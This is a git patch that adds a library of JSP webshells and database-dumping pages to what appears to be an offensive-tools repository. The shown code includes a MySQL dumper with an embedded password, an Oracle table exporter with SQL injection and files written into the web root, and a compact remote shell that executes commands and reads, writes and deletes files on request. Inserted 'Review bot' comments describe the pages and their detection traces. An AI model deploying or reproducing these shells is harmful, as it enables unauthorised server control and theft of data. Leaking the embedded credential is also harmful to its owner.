From 6faad041a050c61903ee5bb75724503690e68347 Mon Sep 17 00:00:00 2001 
From: tennc
Date: Mon, 22 Jul 2013 08:59:10 +0800
Subject: [PATCH] update jsp
---
 drag/mysql_jsp脱裤.txt | 89 +
 drag/oracle_jsp脱裤.txt | 321 +++
 jsp/hackk8/JSP/Customize.jsp | 59 +
 jsp/hackk8/JSP/JSP无组件实现WEB上传.rar | Bin 0 -> 27698 bytes
 jsp/hackk8/JSP/Java Shell.jsp | 125 ++
 jsp/hackk8/JSP/JspWebshell 1.2.jsp | 788 +++++++
 jsp/hackk8/JSP/cmdjsp.jsp | 31 +
 jsp/hackk8/JSP/jsp-reverse.jsp | 90 +
 jsp/hackk8/JSP/jspspy有屏幕.txt | 2326 +++++++++++++++++++
 jsp/hackk8/JSP/minupload.jsp | 48 +
 jsp/hackk8/JSP/other/download.jsp | 1913 ++++++++++++++++
 jsp/hackk8/JSP/other/jspspy.jsp | 2329 ++++++++++++++++++++
 jsp/hackk8/JSP/other/jspspy_k8.jsp | 2323 +++++++++++++++++++
 jsp/hackk8/JSP/other/thx.jsp | 59 +
 jsp/hackk8/Struts2下shell兼容性报告_K8.txt | 54 +
 jsp/hackk8/jsp2/CmdServlet.class | Bin 0 -> 1785 bytes
 jsp/hackk8/jsp2/CmdServlet.java | 43 +
 jsp/hackk8/jsp2/ListServlet.class | Bin 0 -> 2377 bytes
 jsp/hackk8/jsp2/ListServlet.java | 86 +
 jsp/hackk8/jsp2/UpServlet.class | Bin 0 -> 2072 bytes
 jsp/hackk8/jsp2/UpServlet.java | 71 +
 jsp/hackk8/jsp2/browser.jsp | 1802 +++++++++++++++
 jsp/hackk8/jsp2/cmd.jsp | 35 +
 jsp/hackk8/jsp2/cmdjsp.jsp | 32 +
 jsp/hackk8/jsp2/jsp-reverse.jsp | 91 +
 jsp/hackk8/jsp2/list.jsp | 77 +
 jsp/hackk8/jsp2/up.jsp | 162 ++
 jsp/hackk8/jsp2/win32/cmd_win32.jsp | 31 +
 jsp/hackk8/jsp2/win32/up_win32.jsp | 162 ++
 29 files changed, 13147 insertions(+)
 create mode 100644 drag/mysql_jsp脱裤.txt
 create mode 100644 drag/oracle_jsp脱裤.txt
 create mode 100644 jsp/hackk8/JSP/Customize.jsp
 create mode 100644 jsp/hackk8/JSP/JSP无组件实现WEB上传.rar
 create mode 100644 jsp/hackk8/JSP/Java Shell.jsp
 create mode 100644 jsp/hackk8/JSP/JspWebshell 1.2.jsp
 create mode 100644 jsp/hackk8/JSP/cmdjsp.jsp
 create mode 100644 jsp/hackk8/JSP/jsp-reverse.jsp
 create mode 100644 jsp/hackk8/JSP/jspspy有屏幕.txt
 create mode 100644 jsp/hackk8/JSP/minupload.jsp
 create mode 100644 jsp/hackk8/JSP/other/download.jsp
 create mode 100644 jsp/hackk8/JSP/other/jspspy.jsp
 create mode 100644 jsp/hackk8/JSP/other/jspspy_k8.jsp
 create mode 100644 jsp/hackk8/JSP/other/thx.jsp
 create mode 100644 jsp/hackk8/Struts2下shell兼容性报告_K8.txt
 create mode 100644 jsp/hackk8/jsp2/CmdServlet.class
 create mode 100644 jsp/hackk8/jsp2/CmdServlet.java
 create mode 100644 jsp/hackk8/jsp2/ListServlet.class
 create mode 100644 jsp/hackk8/jsp2/ListServlet.java
 create mode 100644 jsp/hackk8/jsp2/UpServlet.class
 create mode 100644 jsp/hackk8/jsp2/UpServlet.java
 create mode 100644 jsp/hackk8/jsp2/browser.jsp
 create mode 100644 jsp/hackk8/jsp2/cmd.jsp
 create mode 100644 jsp/hackk8/jsp2/cmdjsp.jsp
 create mode 100644 jsp/hackk8/jsp2/jsp-reverse.jsp
 create mode 100644 jsp/hackk8/jsp2/list.jsp
 create mode 100644 jsp/hackk8/jsp2/up.jsp
 create mode 100644 jsp/hackk8/jsp2/win32/cmd_win32.jsp
 create mode 100644 jsp/hackk8/jsp2/win32/up_win32.jsp
diff --git a/drag/mysql_jsp脱裤.txt b/drag/mysql_jsp脱裤.txt
new file mode 100644
index 0000000..54ca712
--- /dev/null
+++ b/drag/mysql_jsp脱裤.txt
@@ -0,0 +1,89 @@ +<%@ page import="java.sql.*" %> +<%@ page import="java.util.*" %> +<%@ page import="java.io.*" %> +<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> +<% +try { + //±¸·ގļ�ľ�¾¶ + String backupDir = "/home/tomcat-oa/webapps/ROOT/video/ab1/"; + String ex=".txt"; + String driver = "com.mysql.jdbc.Driver"; + + String url = "jdbc:mysql://localhost:3306/oa"; + String username = "oa"; + String password = "LOa2(2.DX,v>15^td8nWe!L"; + + Class.forName(driver); + Connection conn = DriverManager.getConnection(url, username, password); + + // Get tables + DatabaseMetaData dmd = conn.getMetaData(); + ResultSet rs = dmd.getTables(null, null, "%", null); + ArrayList tables = new ArrayList(); + while (rs.next()) { + tables.add(rs.getString(3)); + } + rs.close(); + + + + ResultSetMetaData rsmd = null; + Statement stmt = conn.createStatement(); + for (String table : tables) { + + rs = stmt.executeQuery("SHOW CREATE TABLE " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + /* + * mysql> SHOW CREATE TABLE t\G + *************************** 1. row *************************** + * Table: t + * Create Table: CREATE TABLE t ( + * id int(11) default NULL auto_increment, + * s char(60) default NULL, + * PRIMARY KEY (id) + * ) TYPE=MyISAM + */ + // JDBC is 1-based, Java is not !? +// osw.append(rs.getString(2) + "\n\n"); + } + rs.close(); + + out.println("Dumping data for table " + table + "...
"); + OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8"); + BufferedWriter bw=new BufferedWriter(osw); + rs = stmt.executeQuery("SELECT * FROM " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + bw.append("INSERT INTO " + table + " VALUES("); + // JDBC is 1-based, Java is not !? + for (int col = 1; col <= rsmd.getColumnCount(); col++) { + bw.append("'"); + if (rs.getString(col) == null) + bw.append(""); + else + bw.append(rs.getString(col)); + if (col == rsmd.getColumnCount()) + bw.append("'"); + else + bw.append("',"); + } + bw.append(");"); + bw.newLine(); + } + bw.flush(); + bw.close(); + osw.close(); + rs.close(); + } + stmt.close(); + + out.println("backup is ok"); + + conn.close(); +} catch (Exception e) { + response.setStatus(200); + e.printStackTrace(); +} +out.println("

finished

"); +%> diff --git a/drag/oracle_jsp脱裤.txt b/drag/oracle_jsp脱裤.txt new file mode 100644 index 0000000..efcd7cd --- /dev/null +++ b/drag/oracle_jsp脱裤.txt @@ -0,0 +1,321 @@ +<%@ page language="java" import="java.util.*" pageEncoding="GBK"%> + +<%@ page import="oracle.jdbc.*"%> + +<%@ page import="java.sql.*" %> + +<%@ page contentType="text/html; charset=GBK" %> + +<%@ page import="java.io.*" %> + +<% + +String path = request.getContextPath(); + +String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; + +%> + + + + + + + + + + + + XXOO + + + + + + + + + + + + + + + + + + + + <% + + String url = "http://" + request.getServerName() + ":" + request.getServerPort() + request.getContextPath()+request.getServletPath(); + + Class.forName("oracle.jdbc.driver.OracleDriver").newInstance(); + + ResultSet rs=null; + + ResultSet rs_column=null; + + ResultSet rs_dump=null; + + String oraUrl="jdbc:oracle:thin:@192.168.1.81:1521:db"; + + String oraUser="username"; + + String oraPWD="password"; + + int size=30000; + + try + + { + + DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver()); + + } + + catch (SQLException e){ + + out.print("filed!!"); + + } + + try + + { + + Connection conn=DriverManager.getConnection(oraUrl,oraUser,oraPWD); + + conn.setAutoCommit(false); + + if (request.getParameter("table") == null || request.getParameter("table").equals("")) + + { + + out.print("xixi...
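Review bot: The connection settings at the top of the scriptlet look as if they were copied from a real deployment rather than written as sample values: `backupDir` is `/home/tomcat-oa/webapps/ROOT/video/ab1/` and `username` and `password` are literal strings next to `jdbc:mysql://localhost:3306/oa`. If the file is kept as a reference sample, those literals should be replaced with labelled placeholders, for example `String password = "<REDACTED>";`, so the repository does not publish what may be a third party's credential and host layout. For anyone triaging a server, the rest of the hunk gives the behaviour to match on: the page walks `DatabaseMetaData.getTables`, runs `SELECT * FROM` each table, and writes one `<table>.txt` file per table into a directory under the web root.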
"); + + Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt.executeQuery("select table_name from all_tables"); + + while(rs.next()) + + { + + out.print("");out.print(rs.getString(1));out.print("
"); + + } + + rs.close(); + + stmt.close(); + + } + + else + + { + + out.print("Current table : "+request.getParameter("table")); + + String sql_count="select count(*) from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_column="select * from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_columns_count="select count(*) from "+request.getParameter("table"); + + //String sql_dump="select rownom ro,* from T_SYS_USER"; + + Statement stmt_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_column=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_columns_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt_count.executeQuery(sql_count); + + rs_column=stmt_column.executeQuery(sql_column); + + ResultSet rs_columns_count=null; + + rs_columns_count=stmt_columns_count.executeQuery(sql_columns_count); + + + + conn.commit(); + + int count=0; + + while(rs.next()) + + { + + count=Integer.parseInt(rs.getString(1)); + + //out.print(count); + + } + + int columns_count=0; + + while(rs_columns_count.next()) // Total number of records + + { + + columns_count=Integer.parseInt(rs_columns_count.getString(1)); + + out.print("
The number of records : "+columns_count+"
"); + + } + + //out.print(columns_count); + + int column_num=1; + + //out.print("");out.print(""); + + String sql_dump="select * from (select rownum ro "; //SELECT + + while(rs_column.next()) + + { + + //out.print(rs_column.getString(3));out.print("\r"); + + sql_dump+=","; + + sql_dump+=rs_column.getString(3); + + column_num+=1; + + + + } + + rs_column.close(); + + rs.close(); //close + + stmt_count.close(); + + stmt_column.close(); + + sql_dump+=" from "+request.getParameter("table")+" where rownum<="; + + int mark=0; + + mark=columns_count; + + out.print("


Please download:
"); + + while(true) + + { + + if(mark<=size) //one txt count + + { mark=0; } + + else + + { mark=mark-size; } + + String dump=sql_dump+columns_count+") where ro>="+mark; + + columns_count-=size; + + Statement stmt_dump=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs_dump= stmt_dump.executeQuery(dump); + + conn.commit(); + + String filename = request.getRealPath(request.getParameter("table")+"-"+mark+".txt"); + + java.io.File f = new java.io.File(filename); + + if(!f.exists()) + + { f.createNewFile(); } + + try + + { + + PrintWriter pw = new PrintWriter(new FileOutputStream(filename)); + + while(rs_dump.next()) + + { + + column_num=1; + + while(column_num<=count) + + { + + pw.print(rs_dump.getString(column_num)); + + pw.print(","); + + column_num+=1; + + } + + pw.println(""); + + } + + pw.close(); + + } + + catch(IOException e) { + + out.println(e.getMessage()); + + } + + out.println("
"+request.getParameter("table")+"-"+mark+".txt
"); + + if(mark==0) + + { + + rs_dump.close(); + + stmt_dump.close(); + + break; + + } + + } + + } + + conn.close(); + + } catch (SQLException e) + + { + + System.out.println(e.toString()); + + out.print(e.toString()); + + } + + %> + + + + + + diff --git a/jsp/hackk8/JSP/Customize.jsp b/jsp/hackk8/JSP/Customize.jsp new file mode 100644 index 0000000..d3acce2 --- /dev/null +++ b/jsp/hackk8/JSP/Customize.jsp 
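Review bot: Nothing in this page says what it is or what it leaves on disk, and that matters because it has no access check and takes its only input from the `table` request parameter. That parameter is concatenated into `sql_count`, `sql_column` and `sql_columns_count`, and into the name passed to `request.getRealPath(...)`, so each request writes `<table>-<offset>.txt` files, chunked by `size`, into the web application directory, where they remain after the request ends. A header comment recording this would help whoever analyses the sample, e.g. `<%-- sample: unauthenticated Oracle table export; artefacts: <table>-<n>.txt under the webapp root --%>`. Unexpected `.txt` files with that naming in a webapp root, or `all_tables` / `all_tab_columns` queries issued by the application's database account, are the traces this page would leave.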
@@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="k8"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else 
if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file 
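Review bot: `Pwd` is named like a password but is never compared with anything: in the scriptlet `request.getParameter(Pwd)` is read into `Z` and used directly as the selector for the `Z.equals("A")` … `Z.equals("Q")` chain, so the page performs no access check at all. A comment at the declaration would stop readers mistaking it for one, e.g. `// Pwd is the NAME of the request parameter carrying the action letter; its value is not verified as a secret`. The same comment could record that `z0` sets the charset, `z1` and `z2` are passed to the helpers, and every reply is framed by `->|` and `|<-`, since those fixed parameter names and markers are what request and response inspection can match on. The helper declarations in the `<%! %>` section appear truncated on this page, so this note covers only the dispatch scriptlet.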
diff --git a/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar b/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar new file mode 100644 index 0000000000000000000000000000000000000000..f81f6a156d427e68a2400a0bc437da47a3a2ee1d GIT binary patch literal 27698 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 z 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 